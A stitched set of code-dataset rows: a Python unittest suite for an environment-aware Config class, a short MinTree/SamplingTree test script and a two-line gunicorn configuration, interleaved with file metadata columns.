config = module.Config('xxx', path = fixture_foo_src_nested_path)
self.assertDeepEqual(map(deepdict, config.__env_config_files__), map(deepdict, env_config_files))
config = module.Config('xxx', path = fixture_foo_src_nested_path, detect = True)
self.assertDeepEqual(map(deepdict, config.__env_config_files__), map(deepdict, env_config_files))
def test_config(self):
try:
del env['A1']
except:
pass
try:
del env['A2']
except:
pass
try:
del env['C2']
except:
pass
config = module.Config(path = fixture_foo_root_path)
self.assertDeepEqual(deepdict(config), deepdict({
'__config_data__': config.__config_data__,
'__config_directory_name__': config.__config_directory_name__,
'__config_files__': config.__config_files__,
'__config_path__': config.__config_path__,
'__default_config_file__': config.__default_config_file__,
'__env_config_file__': config.__env_config_file__,
'__env_config_files__': config.__env_config_files__,
'__env_variables_file__': config.__env_variables_file__,
'__env__': config.__env__,
'__files__': config.__files__,
'__logger__': config.__logger__,
'__path__': config.__path__,
'__root_path__': config.__root_path__,
'__silent__': config.__silent__,
'a1': 'DEFAULT 1',
'a2': {
'b1': [1, 2, 3],
'b2': ['foo', 'bar'],
'b3': {
'c1': 1,
'c2': 'DEFAULT 2',
},
},
}))
config = module.Config('development', path = fixture_foo_root_path)
self.assertDeepEqual(deepdict(config), deepdict({
'__config_data__': config.__config_data__,
'__config_directory_name__': config.__config_directory_name__,
'__config_files__': config.__config_files__,
'__config_path__': config.__config_path__,
'__default_config_file__': config.__default_config_file__,
'__env_config_file__': config.__env_config_file__,
'__env_config_files__': config.__env_config_files__,
'__env_variables_file__': config.__env_variables_file__,
'__env__': config.__env__,
'__files__': config.__files__,
'__logger__': config.__logger__,
'__path__': config.__path__,
'__root_path__': config.__root_path__,
'__silent__': config.__silent__,
'a1': 'DEFAULT 1',
'a2': {
'b1': [1, 2, 3],
'b2': ['DEV 1'],
'b3': {
'c1': 1,
'c2': 'DEV 2',
},
},
'some_key_only_for_dev': True,
}))
config = module.Config('foo', path = fixture_foo_root_path)
self.assertDeepEqual(deepdict(config), deepdict({
'__config_data__': config.__config_data__,
'__config_directory_name__': config.__config_directory_name__,
'__config_files__': config.__config_files__,
'__config_path__': config.__config_path__,
'__default_config_file__': config.__default_config_file__,
'__env_config_file__': config.__env_config_file__,
'__env_config_files__': config.__env_config_files__,
'__env_variables_file__': config.__env_variables_file__,
'__env__': config.__env__,
'__files__': config.__files__,
'__logger__': config.__logger__,
'__path__': config.__path__,
'__root_path__': config.__root_path__,
'__silent__': config.__silent__,
'a1': 'DEFAULT 1',
'a2': {
'b1': [1, 2, 3],
'b2': ['FOO 1'],
'b3': {
'c1': 1,
'c2': 'FOO 2',
},
},
'some_key_only_for_foo': True,
}))
config = module.Config('production', path = fixture_foo_root_path)
self.assertDeepEqual(deepdict(config), deepdict({
'__config_data__': config.__config_data__,
'__config_directory_name__': config.__config_directory_name__,
'__config_files__': config.__config_files__,
'__config_path__': config.__config_path__,
'__default_config_file__': config.__default_config_file__,
'__env_config_file__': config.__env_config_file__,
'__env_config_files__': config.__env_config_files__,
'__env_variables_file__': config.__env_variables_file__,
'__env__': config.__env__,
'__files__': config.__files__,
'__logger__': config.__logger__,
'__path__': config.__path__,
'__root_path__': config.__root_path__,
'__silent__': config.__silent__,
'a1': 'DEFAULT 1',
'a2': {
'b1': [1, 2, 3],
'b2': ['PROD 1'],
'b3': {
'c1': 1,
'c2': 'PROD 2',
},
},
'some_key_only_for_prod': True,
}))
config = module.Config('xxx', path = fixture_foo_root_path)
self.assertDeepEqual(deepdict(config), deepdict({
'__config_data__': config.__config_data__,
'__config_directory_name__': config.__config_directory_name__,
'__config_files__': config.__config_files__,
'__config_path__': config.__config_path__,
'__default_config_file__': config.__default_config_file__,
'__env_config_file__': config.__env_config_file__,
'__env_config_files__': config.__env_config_files__,
'__env_variables_file__': config.__env_variables_file__,
'__env__': config.__env__,
'__files__': config.__files__,
'__logger__': config.__logger__,
'__path__': config.__path__,
'__root_path__': config.__root_path__,
'__silent__': config.__silent__,
'a1': 'DEFAULT 1',
'a2': {
'b1': [1, 2, 3],
'b2': ['foo', 'bar'],
'b3': {
'c1': 1,
'c2': 'DEFAULT 2',
},
},
}))
env['A1'] = CUSTOM_ENV.get('A1')
env['A2'] = CUSTOM_ENV.get('A2')
env['C2'] = CUSTOM_ENV.get('C2')
config = module.Config('foo', path = fixture_foo_root_path)
self.assertDeepEqual(deepdict(config), deepdict({
'__config_data__': config.__config_data__,
'__config_directory_name__': config.__config_directory_name__,
'__config_files__': config.__config_files__,
'__config_path__': config.__config_path__,
'__default_config_file__': config.__default_config_file__,
'__env_config_file__': config.__env_config_file__,
'__env_config_files__': config.__env_config_files__,
'__env_variables_file__': config.__env_variables_file__,
'__env__': config.__env__,
'__files__': config.__files__,
'__logger__': config.__logger__,
'__path__': config.__path__,
'__root_path__': config.__root_path__,
'__silent__': config.__silent__,
'a1': env['A1'],
'a2': {
'b1': [1, 2, 3],
'b2': ['FOO 1'],
'b3': {
'c1': 1,
'c2': env['C2'],
},
},
'some_key_only_for_foo': True,
}))
del env['A1']
del env['A2']
del env['C2']
# NOTE: verify case of `custom-environment-variables` empty
config = module.Config('bar', path = fixture_bar_root_path, silent = False)
self.assertDeepEqual(deepdict(config), deepdict({
'__config_data__': config.__config_data__,
'__config_directory_name__': config.__config_directory_name__,
'__config_files__': config.__config_files__,
'__config_path__': config.__config_path__,
'__default_config_file__': config.__default_config_file__,
'__env_config_file__': config.__env_config_file__,
'__env_config_files__': config.__env_config_files__,
'__env_variables_file__': config.__env_variables_file__,
'__env__': config.__env__,
'__files__': config.__files__,
'__logger__': config.__logger__,
'__path__': config.__path__,
'__root_path__': config.__root_path__,
'__silent__': config.__silent__,
'a1': 'DEFAULT 1',
'a2': {
'b1': [1, 2, 3],
'b2': ['foo', 'bar'],
'b3': {
'c1': 1,
'c2': 'DEFAULT 2',
},
},
}))
# NOTE: verify case of `custom-environment-variables` non-existing
config = module.Config('baz', path = fixture_baz_root_path, silent = False)
self.assertDeepEqual(deepdict(config), deepdict({
'__config_data__': config.__config_data__,
'__config_directory_name__': config.__config_directory_name__,
'__config_files__': config.__config_files__,
'__config_path__': config.__config_path__,
'__default_config_file__': config.__default_config_file__,
'__env_config_file__': config.__env_config_file__,
'__env_config_files__': config.__env_config_files__,
'__env_variables_file__': config.__env_variables_file__,
'__env__': config.__env__,
'__files__': config.__files__,
'__logger__': config.__logger__,
'__path__': config.__path__,
'__root_path__': config.__root_path__,
'__silent__': config.__silent__,
}))
def test_get_env(self):
self.assertTrue(hasattr(module.Config(), 'get_env'))
try:
del env['ENV']
except:
pass
try:
del env['PYTHON_ENV']
except:
pass
config = module.Config('development')
self.assertEqual(config.get_env(), 'development')
config = module.Config('foo')
self.assertEqual(config.get_env(), 'foo')
config = module.Config('production')
self.assertEqual(config.get_env(), 'production')
env['PYTHON_ENV'] = 'development'
# config = module.Config()
config = module.Config.create()
self.assertEqual(config.get_env(), 'development')
env['PYTHON_ENV'] = 'foo'
# config = module.Config()
config = module.Config.create()
self.assertEqual(config.get_env(), 'foo')
env['PYTHON_ENV'] = 'production'
# config = module.Config()
config = module.Config.create()
self.assertEqual(config.get_env(), 'production')
try:
del env['ENV']
except:
pass
try:
del env['PYTHON_ENV']
except:
pass
# config = module.Config()
config = module.Config.create()
self.assertEqual(config.get_env(), None)
def test_get(self):
self.assertTrue(hasattr(module.Config(), 'get'))
try:
del env['A1']
except:
pass
try:
del env['A2']
except:
pass
try:
del env['C2']
except:
pass
config = module.Config(path = fixture_foo_root_path)
self.assertDeepEqual(deepdict(config.get()), deepdict({
'__config_data__': config.__config_data__,
'__config_directory_name__': config.__config_directory_name__,
'__config_files__': config.__config_files__,
'__config_path__': config.__config_path__,
'__default_config_file__': config.__default_config_file__,
'__env_config_file__': config.__env_config_file__,
'__env_config_files__': config.__env_config_files__,
'__env_variables_file__': config.__env_variables_file__,
'__env__': config.__env__,
'__files__': config.__files__,
'__logger__': config.__logger__,
'__path__': config.__path__,
'__root_path__': config.__root_path__,
'__silent__': config.__silent__,
'a1': 'DEFAULT 1',
'a2': {
'b1': [1, 2, 3],
'b2': ['foo', 'bar'],
'b3': {
'c1': 1,
'c2': 'DEFAULT 2',
},
},
}))
config = module.Config('development', path = fixture_foo_root_path)
self.assertEqual(config.__env__, 'development')
self.assertTrue(isinstance(config.__env_config_file__, dict))
self.assertTrue(config.__env__ in config.__env_config_file__.path)
self.assertDeepEqual(deepdict(config.get()), deepdict({
'__config_data__': config.__config_data__,
'__config_directory_name__': config.__config_directory_name__,
'__config_files__': config.__config_files__,
'__config_path__': config.__config_path__,
'__default_config_file__': config.__default_config_file__,
'__env_config_file__': config.__env_config_file__,
'__env_config_files__': config.__env_config_files__,
'__env_variables_file__': config.__env_variables_file__,
'__env__': config.__env__,
'__files__': config.__files__,
'__logger__': config.__logger__,
'__path__': config.__path__,
'__root_path__': config.__root_path__,
'__silent__': config.__silent__,
'a1': 'DEFAULT 1',
'a2': {
'b1': [1, 2, 3],
'b2': ['DEV 1'],
'b3': {
'c1': 1,
'c2': 'DEV 2',
},
},
'some_key_only_for_dev': True,
}))
config = module.Config('foo', path = fixture_foo_root_path)
self.assertEqual(config.__env__, 'foo')
self.assertTrue(isinstance(config.__env_config_file__, dict))
self.assertTrue(config.__env__ in config.__env_config_file__.path)
self.assertDeepEqual(deepdict(config.get()), deepdict({
'__config_data__': config.__config_data__,
'__config_directory_name__': config.__config_directory_name__,
'__config_files__': config.__config_files__,
'__config_path__': config.__config_path__,
'__default_config_file__': config.__default_config_file__,
'__env_config_file__': config.__env_config_file__,
'__env_config_files__': config.__env_config_files__,
'__env_variables_file__': config.__env_variables_file__,
'__env__': config.__env__,
'__files__': config.__files__,
'__logger__': config.__logger__,
'__path__': config.__path__,
'__root_path__': config.__root_path__,
'__silent__': config.__silent__,
'a1': 'DEFAULT 1',
'a2': {
'b1': [1, 2, 3],
'b2': ['FOO 1'],
'b3': {
'c1': 1,
'c2': 'FOO 2',
},
},
'some_key_only_for_foo': True,
}))
config = module.Config('production', path = fixture_foo_root_path)
self.assertEqual(config.__env__, 'production')
self.assertTrue(isinstance(config.__env_config_file__, dict))
self.assertTrue(config.__env__ in config.__env_config_file__.path)
self.assertDeepEqual(deepdict(config.get()), deepdict({
'__config_data__': config.__config_data__,
'__config_directory_name__': config.__config_directory_name__,
'__config_files__': config.__config_files__,
'__config_path__': config.__config_path__,
'__default_config_file__': config.__default_config_file__,
'__env_config_file__': config.__env_config_file__,
'__env_config_files__': config.__env_config_files__,
'__env_variables_file__': config.__env_variables_file__,
'__env__': config.__env__,
'__files__': config.__files__,
'__logger__': config.__logger__,
'__path__': config.__path__,
'__root_path__': config.__root_path__,
'__silent__': config.__silent__,
'a1': 'DEFAULT 1',
'a2': {
'b1': [1, 2, 3],
'b2': ['PROD 1'],
'b3': {
'c1': 1,
'c2': 'PROD 2',
},
},
'some_key_only_for_prod': True,
}))
config = module.Config('xxx', path = fixture_foo_root_path)
self.assertDeepEqual(deepdict(config.get()), deepdict({
'__config_data__': config.__config_data__,
'__config_directory_name__': config.__config_directory_name__,
'__config_files__': config.__config_files__,
'__config_path__': config.__config_path__,
'__default_config_file__': config.__default_config_file__,
'__env_config_file__': config.__env_config_file__,
'__env_config_files__': config.__env_config_files__,
'__env_variables_file__': config.__env_variables_file__,
'__env__': config.__env__,
'__files__': config.__files__,
'__logger__': config.__logger__,
'__path__': config.__path__,
'__root_path__': config.__root_path__,
'__silent__': config.__silent__,
'a1': 'DEFAULT 1',
'a2': {
'b1': [1, 2, 3],
'b2': ['foo', 'bar'],
'b3': {
'c1': 1,
'c2': 'DEFAULT 2',
},
},
}))
env['A1'] = CUSTOM_ENV.get('A1')
env['A2'] = CUSTOM_ENV.get('A2')
env['C2'] = CUSTOM_ENV.get('C2')
config = module.Config('foo', path = fixture_foo_root_path)
self.assertDeepEqual(deepdict(config.get()), deepdict({
'__config_data__': config.__config_data__,
'__config_directory_name__': config.__config_directory_name__,
'__config_files__': config.__config_files__,
'__config_path__': config.__config_path__,
'__default_config_file__': config.__default_config_file__,
'__env_config_file__': config.__env_config_file__,
'__env_config_files__': config.__env_config_files__,
'__env_variables_file__': config.__env_variables_file__,
'__env__': config.__env__,
'__files__': config.__files__,
'__logger__': config.__logger__,
'__path__': config.__path__,
'__root_path__': config.__root_path__,
'__silent__': config.__silent__,
'a1': env['A1'],
'a2': {
'b1': [1, 2, 3],
'b2': ['FOO 1'],
'b3': {
'c1': 1,
'c2': env['C2'],
},
},
'some_key_only_for_foo': True,
}))
del env['A1']
del env['A2']
del env['C2']
def test_keys(self):
self.assertTrue(hasattr(module.Config(), 'keys'))
try:
del env['A1']
except:
pass
try:
del env['A2']
except:
pass
try:
del env['C2']
except:
pass
config = module.Config(path = fixture_foo_root_path)
self.assertDeepEqual(config.keys(), [
'__config_data__',
'__config_directory_name__',
'__config_files__',
'__config_path__',
'__default_config_file__',
'__env_config_file__',
'__env_config_files__',
'__env_variables_file__',
'__env__',
'__files__',
'__logger__',
'__path__',
'__root_path__',
'__silent__',
'a1',
'a2',
])
config = module.Config('development', path = fixture_foo_root_path)
self.assertDeepEqual(config.keys(), [
'__config_data__',
'__config_directory_name__',
'__config_files__',
'__config_path__',
'__default_config_file__',
'__env_config_file__',
'__env_config_files__',
'__env_variables_file__',
'__env__',
'__files__',
'__logger__',
'__path__',
'__root_path__',
'__silent__',
'a1',
'a2',
'some_key_only_for_dev',
])
config = module.Config('foo', path = fixture_foo_root_path)
self.assertDeepEqual(config.keys(), [
'__config_data__',
'__config_directory_name__',
'__config_files__',
'__config_path__',
'__default_config_file__',
'__env_config_file__',
'__env_config_files__',
'__env_variables_file__',
'__env__',
'__files__',
'__logger__',
'__path__',
'__root_path__',
'__silent__',
'a1',
'a2',
'some_key_only_for_foo',
])
config = module.Config('production', path = fixture_foo_root_path)
self.assertDeepEqual(config.keys(), [
'__config_data__',
'__config_directory_name__',
'__config_files__',
'__config_path__',
'__default_config_file__',
'__env_config_file__',
'__env_config_files__',
'__env_variables_file__',
'__env__',
'__files__',
'__logger__',
'__path__',
'__root_path__',
'__silent__',
'a1',
'a2',
'some_key_only_for_prod',
])
config = module.Config('xxx', path = fixture_foo_root_path)
self.assertDeepEqual(config.keys(), [
'__config_data__',
'__config_directory_name__',
'__config_files__',
'__config_path__',
'__default_config_file__',
'__env_config_file__',
'__env_config_files__',
'__env_variables_file__',
'__env__',
'__files__',
'__logger__',
'__path__',
'__root_path__',
'__silent__',
'a1',
'a2',
])
env['A1'] = CUSTOM_ENV.get('A1')
env['A2'] = CUSTOM_ENV.get('A2')
env['C2'] = CUSTOM_ENV.get('C2')
config = module.Config('foo', path = fixture_foo_root_path)
self.assertDeepEqual(config.keys(), [
'__config_data__',
'__config_directory_name__',
'__config_files__',
'__config_path__',
'__default_config_file__',
'__env_config_file__',
'__env_config_files__',
'__env_variables_file__',
'__env__',
'__files__',
'__logger__',
'__path__',
'__root_path__',
'__silent__',
'a1',
'a2',
'some_key_only_for_foo',
])
del env['A1']
del env['A2']
del env['C2']
def test_values(self):
self.assertTrue(hasattr(module.Config(), 'values'))
try:
del env['A1']
except:
pass
try:
del env['A2']
except:
pass
try:
del env['C2']
except:
pass
config = module.Config(path = fixture_foo_root_path)
self.assertDeepEqual(config.values(), [
config.__config_data__,
config.__config_directory_name__,
config.__config_files__,
config.__config_path__,
config.__default_config_file__,
config.__env_config_file__,
config.__env_config_files__,
config.__env_variables_file__,
config.__env__,
config.__files__,
config.__logger__,
config.__path__,
config.__root_path__,
config.__silent__,
default_config_data['a1'],
default_config_data['a2'],
])
config = module.Config('development', path = fixture_foo_root_path)
self.assertDeepEqual(config.values(), [
config.__config_data__,
config.__config_directory_name__,
config.__config_files__,
config.__config_path__,
config.__default_config_file__,
config.__env_config_file__,
config.__env_config_files__,
config.__env_variables_file__,
config.__env__,
config.__files__,
config.__logger__,
config.__path__,
config.__root_path__,
config.__silent__,
default_and_development_config_data['a1'],
default_and_development_config_data['a2'],
default_and_development_config_data['some_key_only_for_dev'],
])
config = module.Config('foo', path = fixture_foo_root_path)
self.assertDeepEqual(config.values(), [
config.__config_data__,
config.__config_directory_name__,
config.__config_files__,
config.__config_path__,
config.__default_config_file__,
config.__env_config_file__,
config.__env_config_files__,
config.__env_variables_file__,
config.__env__,
config.__files__,
config.__logger__,
config.__path__,
config.__root_path__,
config.__silent__,
default_and_foo_config_data['a1'],
default_and_foo_config_data['a2'],
default_and_foo_config_data['some_key_only_for_foo'],
])
config = module.Config('production', path = fixture_foo_root_path)
self.assertDeepEqual(config.values(), [
config.__config_data__,
config.__config_directory_name__,
config.__config_files__,
config.__config_path__,
config.__default_config_file__,
config.__env_config_file__,
config.__env_config_files__,
config.__env_variables_file__,
config.__env__,
config.__files__,
config.__logger__,
config.__path__,
config.__root_path__,
config.__silent__,
default_and_production_config_data['a1'],
default_and_production_config_data['a2'],
default_and_production_config_data['some_key_only_for_prod'],
])
config = module.Config('xxx', path = fixture_foo_root_path)
self.assertDeepEqual(config.values(), [
config.__config_data__,
config.__config_directory_name__,
config.__config_files__,
config.__config_path__,
config.__default_config_file__,
config.__env_config_file__,
config.__env_config_files__,
config.__env_variables_file__,
config.__env__,
config.__files__,
config.__logger__,
config.__path__,
config.__root_path__,
config.__silent__,
default_config_data['a1'],
default_config_data['a2'],
])
env['A1'] = CUSTOM_ENV.get('A1')
env['A2'] = CUSTOM_ENV.get('A2')
env['C2'] = CUSTOM_ENV.get('C2')
config = module.Config('foo', path = fixture_foo_root_path)
self.assertDeepEqual(config.values(), [
config.__config_data__,
config.__config_directory_name__,
config.__config_files__,
config.__config_path__,
config.__default_config_file__,
config.__env_config_file__,
config.__env_config_files__,
config.__env_variables_file__,
config.__env__,
config.__files__,
config.__logger__,
config.__path__,
config.__root_path__,
config.__silent__,
env['A1'],
Config.merge(
default_and_foo_config_data['a2'],
{
'b3': {
'c2': env['C2']
},
},
),
default_and_foo_config_data['some_key_only_for_foo'],
])
del env['A1']
del env['A2']
del env['C2']
def test_has(self):
self.assertTrue(hasattr(module.Config(), 'has'))
config = module.Config(path = fixture_foo_root_path)
self.assertDeepEqual(config.has('a1'), True)
self.assertDeepEqual(config.has('a2'), True)
self.assertDeepEqual(config.has('some_key_only_for_dev'), False)
self.assertDeepEqual(config.has('some_key_only_for_foo'), False)
self.assertDeepEqual(config.has('some_key_only_for_prod'), False)
self.assertDeepEqual(config.has('xxx'), False)
config = module.Config('development', path = fixture_foo_root_path)
self.assertDeepEqual(config.has('a1'), True)
self.assertDeepEqual(config.has('a2'), True)
self.assertDeepEqual(config.has('some_key_only_for_dev'), True)
self.assertDeepEqual(config.has('some_key_only_for_foo'), False)
self.assertDeepEqual(config.has('some_key_only_for_prod'), False)
self.assertDeepEqual(config.has('xxx'), False)
config = module.Config('foo', path = fixture_foo_root_path)
self.assertDeepEqual(config.has('a1'), True)
self.assertDeepEqual(config.has('a2'), True)
self.assertDeepEqual(config.has('some_key_only_for_dev'), False)
self.assertDeepEqual(config.has('some_key_only_for_foo'), True)
self.assertDeepEqual(config.has('some_key_only_for_prod'), False)
self.assertDeepEqual(config.has('xxx'), False)
config = module.Config('production', path = fixture_foo_root_path)
self.assertDeepEqual(config.has('a1'), True)
self.assertDeepEqual(config.has('a2'), True)
self.assertDeepEqual(config.has('some_key_only_for_dev'), False)
self.assertDeepEqual(config.has('some_key_only_for_foo'), False)
self.assertDeepEqual(config.has('some_key_only_for_prod'), True)
self.assertDeepEqual(config.has('xxx'), False)
config = module.Config('xxx', path = fixture_foo_root_path)
self.assertDeepEqual(config.has('a1'), True)
self.assertDeepEqual(config.has('a2'), True)
self.assertDeepEqual(config.has('some_key_only_for_dev'), False)
self.assertDeepEqual(config.has('some_key_only_for_foo'), False)
self.assertDeepEqual(config.has('some_key_only_for_prod'), False)
self.assertDeepEqual(config.has('xxx'), False)
env['A1'] = CUSTOM_ENV.get('A1')
env['A2'] = CUSTOM_ENV.get('A2')
env['C2'] = CUSTOM_ENV.get('C2')
config = module.Config('foo', path = fixture_foo_root_path)
self.assertDeepEqual(config.has('a1'), True)
self.assertDeepEqual(config.has('a2'), True)
self.assertDeepEqual(config.has('some_key_only_for_dev'), False)
self.assertDeepEqual(config.has('some_key_only_for_foo'), True)
self.assertDeepEqual(config.has('some_key_only_for_prod'), False)
self.assertDeepEqual(config.has('xxx'), False)
del env['A1']
del env['A2']
del env['C2']
def test_class_create(self):
try:
del env['ENV']
except:
pass
self.assertEqual(env.get('ENV', None), None)
try:
del env['A1']
except:
pass
try:
del env['A2']
except:
pass
try:
del env['C2']
except:
pass
config = module.Config.create(path = fixture_foo_root_path)
self.assertEqual(config.__env__, None)
self.assertDeepEqual(deepdict(config), deepdict({
'__config_data__': config.__config_data__,
'__config_directory_name__': config.__config_directory_name__,
'__config_files__': config.__config_files__,
'__config_path__': config.__config_path__,
'__default_config_file__': config.__default_config_file__,
'__env_config_file__': config.__env_config_file__,
'__env_config_files__': config.__env_config_files__,
'__env_variables_file__': config.__env_variables_file__,
'__env__': config.__env__,
'__files__': config.__files__,
'__logger__': config.__logger__,
'__path__': config.__path__,
'__root_path__': config.__root_path__,
'__silent__': config.__silent__,
'a1': 'DEFAULT 1',
'a2': {
'b1': [1, 2, 3],
'b2': ['foo', 'bar'],
'b3': {
'c1': 1,
'c2': 'DEFAULT 2',
},
},
}))
env['ENV'] = 'development'
self.assertEqual(env.get('ENV', None), 'development')
config = module.Config.create(path = fixture_foo_root_path)
self.assertEqual(config.__env__, 'development')
self.assertDeepEqual(deepdict(config), deepdict({
'__config_data__': config.__config_data__,
'__config_directory_name__': config.__config_directory_name__,
'__config_files__': config.__config_files__,
'__config_path__': config.__config_path__,
'__default_config_file__': config.__default_config_file__,
'__env_config_file__': config.__env_config_file__,
'__env_config_files__': config.__env_config_files__,
'__env_variables_file__': config.__env_variables_file__,
'__env__': config.__env__,
'__files__': config.__files__,
'__logger__': config.__logger__,
'__path__': config.__path__,
'__root_path__': config.__root_path__,
'__silent__': config.__silent__,
'a1': 'DEFAULT 1',
'a2': {
'b1': [1, 2, 3],
'b2': ['DEV 1'],
'b3': {
'c1': 1,
'c2': 'DEV 2',
},
},
'some_key_only_for_dev': True,
}))
env['ENV'] = 'foo'
self.assertEqual(env.get('ENV', None), 'foo')
config = module.Config.create(path = fixture_foo_root_path)
self.assertEqual(config.__env__, 'foo')
self.assertDeepEqual(deepdict(config), deepdict({
'__config_data__': config.__config_data__,
'__config_directory_name__': config.__config_directory_name__,
'__config_files__': config.__config_files__,
'__config_path__': config.__config_path__,
'__default_config_file__': config.__default_config_file__,
'__env_config_file__': config.__env_config_file__,
'__env_config_files__': config.__env_config_files__,
'__env_variables_file__': config.__env_variables_file__,
'__env__': config.__env__,
'__files__': config.__files__,
'__logger__': config.__logger__,
'__path__': config.__path__,
'__root_path__': config.__root_path__,
'__silent__': config.__silent__,
'a1': 'DEFAULT 1',
'a2': {
'b1': [1, 2, 3],
'b2': ['FOO 1'],
'b3': {
'c1': 1,
'c2': 'FOO 2',
},
},
'some_key_only_for_foo': True,
}))
env['ENV'] = 'production'
self.assertEqual(env.get('ENV', None), 'production')
config = module.Config.create(path = fixture_foo_root_path)
self.assertEqual(config.__env__, 'production')
self.assertDeepEqual(deepdict(config), deepdict({
'__config_data__': config.__config_data__,
'__config_directory_name__': config.__config_directory_name__,
'__config_files__': config.__config_files__,
'__config_path__': config.__config_path__,
'__default_config_file__': config.__default_config_file__,
'__env_config_file__': config.__env_config_file__,
'__env_config_files__': config.__env_config_files__,
'__env_variables_file__': config.__env_variables_file__,
'__env__': config.__env__,
'__files__': config.__files__,
'__logger__': config.__logger__,
'__path__': config.__path__,
'__root_path__': config.__root_path__,
'__silent__': config.__silent__,
'a1': 'DEFAULT 1',
'a2': {
'b1': [1, 2, 3],
'b2': ['PROD 1'],
'b3': {
'c1': 1,
'c2': 'PROD 2',
},
},
'some_key_only_for_prod': True,
}))
env['ENV'] = 'xxx'
self.assertEqual(env.get('ENV', None), 'xxx')
config = module.Config.create(path = fixture_foo_root_path)
self.assertEqual(config.__env__, 'xxx')
self.assertDeepEqual(deepdict(config), deepdict({
'__config_data__': config.__config_data__,
'__config_directory_name__': config.__config_directory_name__,
'__config_files__': config.__config_files__,
'__config_path__': config.__config_path__,
'__default_config_file__': config.__default_config_file__,
'__env_config_file__': config.__env_config_file__,
'__env_config_files__': config.__env_config_files__,
'__env_variables_file__': config.__env_variables_file__,
'__env__': config.__env__,
'__files__': config.__files__,
'__logger__': config.__logger__,
'__path__': config.__path__,
'__root_path__': config.__root_path__,
'__silent__': config.__silent__,
'a1': 'DEFAULT 1',
'a2': {
'b1': [1, 2, 3],
'b2': ['foo', 'bar'],
'b3': {
'c1': 1,
'c2': 'DEFAULT 2',
},
},
}))
env['A1'] = CUSTOM_ENV.get('A1')
env['A2'] = CUSTOM_ENV.get('A2')
env['C2'] = CUSTOM_ENV.get('C2')
env['ENV'] = 'foo'
self.assertEqual(env.get('ENV', None), 'foo')
config = module.Config.create(path = fixture_foo_root_path)
self.assertEqual(config.__env__, 'foo')
self.assertDeepEqual(deepdict(config), deepdict({
'__config_data__': config.__config_data__,
'__config_directory_name__': config.__config_directory_name__,
'__config_files__': config.__config_files__,
'__config_path__': config.__config_path__,
'__default_config_file__': config.__default_config_file__,
'__env_config_file__': config.__env_config_file__,
'__env_config_files__': config.__env_config_files__,
'__env_variables_file__': config.__env_variables_file__,
'__env__': config.__env__,
'__files__': config.__files__,
'__logger__': config.__logger__,
'__path__': config.__path__,
'__root_path__': config.__root_path__,
'__silent__': config.__silent__,
'a1': env['A1'],
'a2': {
'b1': [1, 2, 3],
'b2': ['FOO 1'],
'b3': {
'c1': 1,
'c2': env['C2'],
},
},
'some_key_only_for_foo': True,
}))
del env['A1']
del env['A2']
del env['C2']
def test_config_attribute_get(self):
pass
def test_config_attribute_set(self):
pass
def test_config_attribute_del(self):
pass
def test_config_item_get(self):
pass
def test_config_item_set(self):
pass
def test_config_item_del(self):
pass
# =========================================
# MAIN
# --------------------------------------
if __name__ == '__main__':
helper.run(TestCase)
| 35.769855
| 144
| 0.627517
| 8,804
| 83,773
| 5.242731
| 0.014425
| 0.062396
| 0.099443
| 0.070195
| 0.953225
| 0.933445
| 0.917434
| 0.89852
| 0.889573
| 0.880646
| 0
| 0.00702
| 0.256885
| 83,773
| 2,341
| 145
| 35.785135
| 0.734422
| 0.009168
| 0
| 0.868961
| 0
| 0
| 0.11646
| 0.032601
| 0
| 0
| 0
| 0
| 0.192633
| 1
| 0.015097
| false
| 0.032005
| 0.006039
| 0
| 0.021739
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
3303bdff3585f07d061406993fcb444435a9deda
| 418
|
py
|
Python
|
testMinTree.py
|
JunhaoWang/fraudar
|
0bb1f95f1a8846db80e871b103d6a9586d523ffe
|
[
"Apache-2.0"
] | 14
|
2020-04-02T14:54:58.000Z
|
2022-02-14T05:28:54.000Z
|
testMinTree.py
|
JunhaoWang/fraudar
|
0bb1f95f1a8846db80e871b103d6a9586d523ffe
|
[
"Apache-2.0"
] | null | null | null |
testMinTree.py
|
JunhaoWang/fraudar
|
0bb1f95f1a8846db80e871b103d6a9586d523ffe
|
[
"Apache-2.0"
] | 2
|
2019-11-28T05:20:30.000Z
|
2021-09-03T09:53:38.000Z
|
import math
import random
T = MinTree([1,4,2,5,3])
T.dump()
T.popMin()
T.dump()
T.popMin()
T.dump()
T.changeVal(4, 3)
T.dump()
T.popMin()
T.dump()
T.popMin()
T.dump()
T.changeVal(4, 10)
T.dump()
T.popMin()
T.dump()
T = SamplingTree([10,40,12,50,30], 1)
T.dump()
T.sample()
T.dump()
T.sample()
T.dump()
T.changeVal(3, 3)
T.dump()
T.sample()
T.dump()
T.sample()
T.dump()
T.changeVal(4, 10)
T.dump()
T.sample()
T.dump()
| 11.611111
| 37
| 0.619617
| 87
| 418
| 2.977011
| 0.229885
| 0.30888
| 0.34749
| 0.23166
| 0.772201
| 0.772201
| 0.72973
| 0.683398
| 0.683398
| 0.617761
| 0
| 0.069892
| 0.110048
| 418
| 36
| 38
| 11.611111
| 0.626344
| 0
| 0
| 0.823529
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.058824
| 0
| 0.058824
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
3309b62b2c0188fde8e4784c4cde760347528dd8
| 145
|
py
|
Python
|
gunicorn_config.py
|
smegurus/smegurus-django
|
053973b5ff0b997c52bfaca8daf8e07db64a877c
|
[
"BSD-4-Clause"
] | 1
|
2020-07-16T10:58:23.000Z
|
2020-07-16T10:58:23.000Z
|
gunicorn_config.py
|
smegurus/smegurus-django
|
053973b5ff0b997c52bfaca8daf8e07db64a877c
|
[
"BSD-4-Clause"
] | 13
|
2018-11-30T02:29:39.000Z
|
2022-03-11T23:35:49.000Z
|
gunicorn_config.py
|
smegurus/smegurus-django
|
053973b5ff0b997c52bfaca8daf8e07db64a877c
|
[
"BSD-4-Clause"
] | null | null | null |
command = '/opt/django/smegurus-django/env/bin/gunicorn'
pythonpath = '/opt/django/smegurus-django/smegurus'
